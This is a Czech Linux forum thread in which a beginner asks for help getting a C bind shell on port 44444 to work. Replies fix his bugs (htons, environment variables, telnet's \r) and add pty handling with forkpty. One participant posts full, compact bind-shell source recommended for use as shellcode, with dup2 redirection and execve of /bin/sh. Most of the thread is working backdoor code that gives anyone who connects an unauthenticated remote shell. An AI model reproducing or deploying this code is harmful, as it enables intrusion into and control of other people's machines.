Portál AbcLinuxu, 26. dubna 2024 17:23
Dobry den,
mam takovyto jednoduchy bindshell napsany v C:
www.qg.ic.cz/a/bindshell.c
Podle me by mel po spusteni fungovat tak, ze bude cekat na portu 44444 a po pripojeni (treba pres telnet) mi preda shell. Narazil jsem vsak na dva problemy:
Spustim program
$ ./bindshell
Pokusim se pripojit na port 44444:
$ telnet localhost 44444 Trying 127.0.0.1... telnet: Unable to connect to remote host: Connection refused
Program neposloucha na portu 44444, divne, podivam se tedy pres nmap, kde ve skutecnosti visi:
$ sudo nmap -sS -p1-65000 localhost Starting Nmap 4.76 ( http://nmap.org ) at 2009-02-07 13:03 CET Interesting ports on localhost.localdomain (127.0.0.1): Not shown: 64997 closed ports PORT STATE SERVICE 40109/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 4.83 seconds
Program je na portu 40109, proc? Zkusim se k nemu tedy pripojit:
$ telnet localhost 40109 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. ls : command not found id : command not found
Nemam shell, pouze "visim" v konzoli. Proc? V sitovem programovani jsem zacatecnik, muze mi prosim nekdo tyto dva jevy objasnit? Budu moc vdecny.
Program je na portu 40109, proc? Zkusim se k nemu tedy pripojit:
man htons
Nemam shell, pouze "visim" v konzoli. Proc?
Tipuju, že shell nedostal proměnné prostředí (posl. parametr execve
) - především $PATH
a tudíž netuší, kde má hledat binárky.
BTW - argv[0] není cesta, ale pouze basename (tj. spouštět stylem execve("/bin/sh", {"sh", NULL}, environ)
).
Na htons jsem uplne zapomnel, dekuji. Porty se uz prirazuji korektne. Program jsem tedy upravil takto:
www.qg.ic.cz/a/bindshell.c
Ale problem s "command not found" stale pretrvava:/
Ale problem s "command not found" stale pretrvava:/
Pokud se přidá parametr -i
pro interaktivní shell, tak mi to běhá (ale dost dobře nechápu proč to bez toho nefunguje a proč si myslí, že argv[0]
je ''
).
\r
taky zpusobuje iluzi prazdneho jmena tim, ze presouva kurzor na zacatek radku a dalsi vypisovany text prepisuje ten puvodni. Pri pouziti delsiho jmena to je hezky videt."ABCDEFGHIJKLMNOPQRSTUVWXYZ"
a zadam prikaz "id"
, ktery telnet posle jako "id\r"
, tak shell v mem pripade vypisuje chybu:ABCDEFGHIJKLMNOPQRSTUVWXYZ: line 1: id\r: command not found\n
: command not foundTUVWXYZ: line 1: id
Dekuji, pomohlo to, program jsem tedy upravil, ted uz ma jen jednu mouchu:
$ nc localhost 44444 sh: no job control in this shell sh-3.2$
Jak se prosim zbavim te hlasky "no job control in this shell"
Tak jsem si vsiml, ze tu hlasku to vypisuje pouze pokud bash volam takto:
execle("/bin/bash", "/bin/bash", "-i", NULL, envp);
Pokud ho zavolam takto (bez parametru -i):
execle("/bin/bash", "/bin/bash", NULL, envp);
je to OK. Ja bych tam ten prompt ale potreboval, nenapada vas jak toho dosahnout?
A je nejaka moznost jak mu ten terminal alokovat i kdyz pouzivam interaktivni rezim? Jednoduse zabranit vypisu te hlasky - nevypada to tam pekne.
man 7 pty
man posix_openpt
A jakym zpusobem to zapomponovat do toho programu? Ta funkce vraci file describtor a ten pak presmeruju do toho socketu stejne jako to delam se stdin, stdout a stderr?
Ano, a bash připojíte na slave.
Jaky slave?
Omlouvam se, asi jsem slepy, ale tady:
man posix_openpt
v sekci return value, je ze ta funkce vraci "a non-negative file descriptor which is the lowest numbered unused descriptor", coz je jeden fd. Kde tedy sezenu ten druhy?
$ man pts ... Unix 98 pseudo-terminals An unused Unix 98 pseudo-terminal master is opened by calling posix_openpt(3). (This function opens the mas‐ ter clone device, /dev/ptmx; see pts(4).) After performing any program-specific initializations, changing the ownership and permissions of the slave device using grantpt(3), and unlocking the slave using unlockpt(3)), the corresponding slave device can be opened by passing the name returned by ptsname(3) in a call to open(2). ...
Tak ja uz se v tom teda nejak nevyznam:-/ Muze mi prosim nejaka dobra duse poradit tak vse vyse zminene naroubuji do tohoto kodu?
... // redirect dup2(sock2, 0); dup2(sock2, 1); // execute execle("/bin/bash", "/bash", "-i", NULL, envp);
Zhruba jde o to, že až otevřete ten terminál, tak vytvoříte nový proces, ve kterém na slave toho terminálu píchnete ten shell a v původním procesu budete přesypávat data z masteru do socketu a zpátky. Není to nic složitého, ale psát to za vás nikdo nebude. Na internetu se válí spousta dokumentace a kódu pro inspiraci.
man fork, wait, select, write/read(/send/recv), ...
Pak se taky možná dostanete k signálům pro kontrolu terminálu/procesu a jejich předávání z klienta a buď se na to vykašlete, nebo budete o kus chytřejší :)
forkpty
, tak se můžete inspirovat. Případne můžou pánové šťouralové vylepšit.
static void run_terminal(int socket) { pid_t p, pp; int m; struct winsize ws = { .ws_row = 25, .ws_col = 80, .ws_xpixel = 0, .ws_ypixel = 0 }; p = forkpty(&m, NULL, NULL, &ws); if (p < 0) { error("forkpty"); close(socket); close(m); return; } if (p > 0) { pp = fork(); if (pp < 0) { error("fork"); close(socket); close(m); return; } if (pp > 0) { close(socket); close(m); return; } close(listen_socket); say("entering copy loop"); copy_loop(m, m, socket, socket); say("copy loop finished"); kill(p, 1); exit(0); } else { close(listen_socket); close(socket); close(m); say("spawning shell"); execl("/bin/bash", "bash", "-i", "-l", NULL); bail("execl"); } }
Skoro mě napadá otázka, na jaké škole se dávají takovéhle úkoly?
3. telnet do radku pridava \r.Jo, to je ten jednoduchý důvod
Ahoj ja pouzivam tento kod - je kratsi a ve vysledku i uspornejsi jako shellkod:
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
int soc,cli;
struct sockaddr_in serv_addr;
int main(){
serv_addr.sin_family=2;
serv_addr.sin_addr.s_addr=0;
serv_addr.sin_port=0x9CAD; // Toto je to tvoje cislo portu 44444 zapsane v hex a prevracene - cili klasicky --> 0xAD9C ---> AD|9C --> 0x9CAD
soc=socket(2,1,0);
bind(soc,(struct sockaddr *)&serv_addr,0x10);
listen(soc,1);
cli=accept(soc,0,0);
dup2(cli,0);
dup2(cli,1);
dup2(cli,2);
execve("/bin/sh",0,0);
}
jinak doporucuji namisto telnet pouzit nc cili:
nc localhost 44444
soc=socket(2,1,0);
atd.) je cesta do pekel. Ten původní kód je přehlednější a nepřijde mi o tolik delší.
Tiskni Sdílej:
ISSN 1214-1267, (c) 1999-2007 Stickfish s.r.o.